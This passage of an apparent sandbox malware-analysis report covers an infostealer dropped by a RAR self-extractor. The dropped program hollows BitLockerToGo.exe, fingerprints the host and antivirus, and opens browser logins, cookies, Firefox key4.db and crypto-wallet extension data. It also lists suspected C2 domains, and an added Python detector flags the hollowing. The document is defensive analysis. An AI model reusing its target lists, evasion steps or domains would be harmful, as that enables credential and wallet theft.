              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\cygwin1.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\qsqlite.dll
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Qt5GuiVBox.dll
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\VBoxProxyStub-x86.dll
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\libintl-8.dll
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\VBoxClient-x86.dll
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Qt5SqlVBox.dll
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\libidn2-0.dll
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\libiconv-2.dll
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Security-Common.dll
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\cygwin1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 1104 -> Thread sleep time: -30000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Code function: 0_2_00007FF70ECEECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF70ECEECE0
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Code function: 0_2_00007FF70ECD647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF70ECD647C
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Code function: 0_2_00007FF70ED03130 FindFirstFileExA,0_2_00007FF70ED03130
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Code function: 0_2_00007FF70ECF5134 VirtualQuery,GetSystemInfo,0_2_00007FF70ECF5134
Source: VBoxProxyStub-x86.dll.0.dr -> Binary or memory string: 0JvPartitionType_VMWareUnknownW@
Source: VBoxProxyStub-x86.dll.0.dr -> Binary or memory string: AdditionsFacilityType_VBoxGuestDriverWWW
Source: VBoxProxyStub-x86.dll.0.dr -> Binary or memory string: !0R4AdditionsFacilityType_VBoxServiceWWW
Source: VBoxProxyStub-x86.dll.0.dr -> Binary or memory string: PartitionType_VMWareVMFS@
Source: VBoxClient-x86.dll.0.dr, VBoxProxyStub-x86.dll.0.dr -> Binary or memory string: AdditionsFacilityType_VBoxTrayClient
Source: VBoxProxyStub-x86.dll.0.dr -> Binary or memory string: PartitionType_VMWareReserved@
Source: VBoxProxyStub-x86.dll.0.dr -> Binary or memory string: aVmNetTx
Source: Qt5GuiVBox.dll -> Binary or memory string: .?AVQEmulationPaintEngine@@H
Source: VBoxProxyStub-x86.dll.0.dr -> Binary or memory string: aVmNetRx
Source: BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002CAD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: Hyper-V RAW
Source: VBoxProxyStub-x86.dll.0.dr -> Binary or memory string: PartitionType_VMWareVMKCoreW@
Source: Imperial_Delay.exe, 00000001.00000002.1878293373.00000000005FE000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Qt5GuiVBox.dll -> Binary or memory string: .?AVQEmulationPaintEngine@@
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> Process information queried: ProcessInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> Code function: 2_2_004442C0 LdrInitializeThunk,2_2_004442C0
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Code function: 0_2_00007FF70ECFAC68 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF70ECFAC68
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Code function: 0_2_00007FF70ED041B0 GetProcessHeap,0_2_00007FF70ED041B0
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Code function: 0_2_00007FF70ECF6B24 SetUnhandledExceptionFilter,0_2_00007FF70ECF6B24
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Code function: 0_2_00007FF70ECF5CE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF70ECF5CE0
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Code function: 0_2_00007FF70ECFAC68 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF70ECFAC68
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Code function: 0_2_00007FF70ECF6940 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF70ECF6940

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe -> Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe -> Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: Imperial_Delay.exe, 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp -> String found in binary or memory: snailyeductyi.sbs
Source: Imperial_Delay.exe, 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp -> String found in binary or memory: ferrycheatyk.sbs
Source: Imperial_Delay.exe, 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp -> String found in binary or memory: deepymouthi.sbs
Source: Imperial_Delay.exe, 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp -> String found in binary or memory: wrigglesight.sbs
Source: Imperial_Delay.exe, 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp -> String found in binary or memory: captaitwik.sbs
Source: Imperial_Delay.exe, 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp -> String found in binary or memory: sidercotay.sbs
Source: Imperial_Delay.exe, 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp -> String found in binary or memory: heroicmint.sbs
Source: Imperial_Delay.exe, 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp -> String found in binary or memory: monstourtu.sbs
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe -> Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2867008
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe -> Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe -> Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe -> Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 449000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe -> Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 44C000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe -> Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 45C000
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Code function: 0_2_00007FF70ECEECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF70ECEECE0
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe -> Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Code function: 0_2_00007FF70ED08DF0 cpuid 0_2_00007FF70ED08DF0
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Code function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF70ECEDE44
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe -> Queries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe -> Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe -> Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Code function: 0_2_00007FF70ECF400C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF70ECF400C
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe -> Code function: 0_2_00007FF70ECD6768 GetVersionExW,0_2_00007FF70ECD6768
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: BitLockerToGo.exe, 00000002.00000003.2023225773.0000000002D1F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2022709028.0000000002D1D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
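The two sections above record the behaviour a detection engineer would key on: Imperial_Delay.exe, running from a RarSFX temp directory, allocates an execute-read-write region at base 400000 inside the signed Windows binary BitLockerToGo.exe and writes an MZ header (4D5A) into it, which is the process-hollowing pattern; the hollowed BitLockerToGo.exe then fingerprints the host through FirmwareTableInformation, a Win32_BIOS query and a SecurityCenter2 AntiVirusProduct query. The Python below is an added example, not part of the Joe Sandbox report: it parses sandbox-style behaviour rows (the sample rows are constructed here to mirror the report's wording; the "Source: ... -> action" layout, the rule names and the temp-directory escalation are this example's own choices) and raises one finding per matched rule, keeping state so that a PE write is only rated as hollowing when it lands in a region the same source previously allocated as executable.

```python
"""Detection logic for the injection and host-fingerprinting rows above.
Added example, not part of the Joe Sandbox report. Event lines are
constructed to mirror the report's rows; the row layout and rule names are
this example's own conventions.
"""
import re
from dataclasses import dataclass

# Constructed sample events (not captured from a live host).
SAMPLE_EVENTS = [
    r"Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe -> Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write",
    r"Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe -> Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A",
    r"Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe -> Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000",
    r"Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> System information queried: FirmwareTableInformation",
    r"Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS",
    r"Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct",
    # Benign control: a non-executable remote allocation must not be flagged.
    r"Source: C:\Program Files\Debugger\dbg.exe -> Memory allocated: C:\Windows\System32\notepad.exe base: 1A0000 protect: page read and write",
]

ALLOC_RE = re.compile(r"^Source: (?P<src>.+?) -> Memory allocated: (?P<dst>.+?) base: (?P<base>[0-9A-Fa-f]+) protect: (?P<prot>.+)$")
WRITE_RE = re.compile(r"^Source: (?P<src>.+?) -> Memory written: (?P<dst>.+?) base: (?P<base>[0-9A-Fa-f]+)(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?$")
WMI_RE = re.compile(r"^Source: (?P<src>.+?) -> WMI Queries: .*?- (?P<ns>ROOT\\\S+) : (?P<query>.+)$")
SYSINFO_RE = re.compile(r"^Source: (?P<src>.+?) -> System information queried: (?P<cls>\S+)$")


@dataclass(frozen=True)
class Finding:
    rule: str
    source: str
    target: str
    detail: str


def from_user_temp(path: str) -> bool:
    """Heuristic (this example's own): code launched out of %LOCALAPPDATA%\\Temp."""
    return "\\appdata\\local\\temp\\" in path.lower()


def analyze(lines):
    """Return a list of Findings for the hollowing and fingerprinting rules."""
    findings = []
    exec_regions = set()  # (src, dst, base) allocated remotely with execute permission
    for line in lines:
        m = ALLOC_RE.match(line)
        if m:
            src, dst, base, prot = m.group("src", "dst", "base", "prot")
            if src != dst and "execute" in prot.lower():
                exec_regions.add((src, dst, base.upper()))
                findings.append(Finding("remote_rwx_alloc", src, dst, f"base {base} protect '{prot}'"))
            continue
        m = WRITE_RE.match(line)
        if m:
            src, dst, base, magic = m.group("src", "dst", "base", "magic")
            # 4D 5A is the 'MZ' signature: a PE image is being written into another process.
            if src != dst and magic and magic.upper().startswith("4D5A"):
                rule = "pe_written_to_remote_rwx" if (src, dst, base.upper()) in exec_regions else "pe_written_to_remote"
                findings.append(Finding(rule, src, dst, f"MZ header at base {base}"))
            continue
        m = WMI_RE.match(line)
        if m:
            src, ns, query = m.group("src", "ns", "query")
            if "SECURITYCENTER2" in ns.upper() and "ANTIVIRUSPRODUCT" in query.upper():
                findings.append(Finding("av_enumeration", src, ns, query))
            elif "WIN32_BIOS" in query.upper():
                findings.append(Finding("bios_fingerprint", src, ns, query))
            continue
        m = SYSINFO_RE.match(line)
        if m and m.group("cls") == "FirmwareTableInformation":
            findings.append(Finding("firmware_table_query", m.group("src"), "", m.group("cls")))
    # Escalate: an injector running from a user temp directory hollowing a binary under C:\Windows.
    for f in list(findings):
        if f.rule.startswith("pe_written") and from_user_temp(f.source) and f.target.lower().startswith("c:\\windows\\"):
            findings.append(Finding("temp_to_system_hollowing", f.source, f.target, "injector runs from user temp directory"))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.rule:28} {f.source} -> {f.target} ({f.detail})")
```

The stateful pairing matters in practice: a lone executable allocation in another process is noisy (debuggers, some AV and game anti-cheat drivers do it), while an MZ header landing in a region the same parent just made executable is the hollowing signature and rarely has a benign explanation.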

              Stealing of Sensitive Information

Source: Yara match -> File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match -> File source: Process Memory Space: BitLockerToGo.exe PID: 2676, type: MEMORYSTR
Source: Yara match -> File source: sslproxydump.pcap, type: PCAP
Source: BitLockerToGo.exe, 00000002.00000003.2023225773.0000000002D1F000.00000004.00000020.00020000.00000000.sdmp -> String found in binary or memory: s/Electrum-LTC
Source: BitLockerToGo.exe, 00000002.00000003.2029618149.0000000002CBC000.00000004.00000020.00020000.00000000.sdmp -> String found in binary or memory: Wallets/ElectronCash
Source: BitLockerToGo.exe, 00000002.00000003.2009812823.0000000002D19000.00000004.00000020.00020000.00000000.sdmp -> String found in binary or memory: Jaxx Liberty
Source: BitLockerToGo.exe, 00000002.00000003.2029618149.0000000002CBC000.00000004.00000020.00020000.00000000.sdmp -> String found in binary or memory: window-state.json
Source: BitLockerToGo.exe, 00000002.00000003.2010145588.0000000002CBA000.00000004.00000020.00020000.00000000.sdmp -> String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: BitLockerToGo.exe, 00000002.00000003.2009812823.0000000002D19000.00000004.00000020.00020000.00000000.sdmp -> String found in binary or memory: Wallets/Exodus
Source: BitLockerToGo.exe, 00000002.00000003.2029618149.0000000002CBC000.00000004.00000020.00020000.00000000.sdmp -> String found in binary or memory: %appdata%\Ethereum
Source: BitLockerToGo.exe, 00000002.00000003.1951968090.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp -> String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: BitLockerToGo.exe, 00000002.00000003.1951968090.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp -> String found in binary or memory: keystore
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
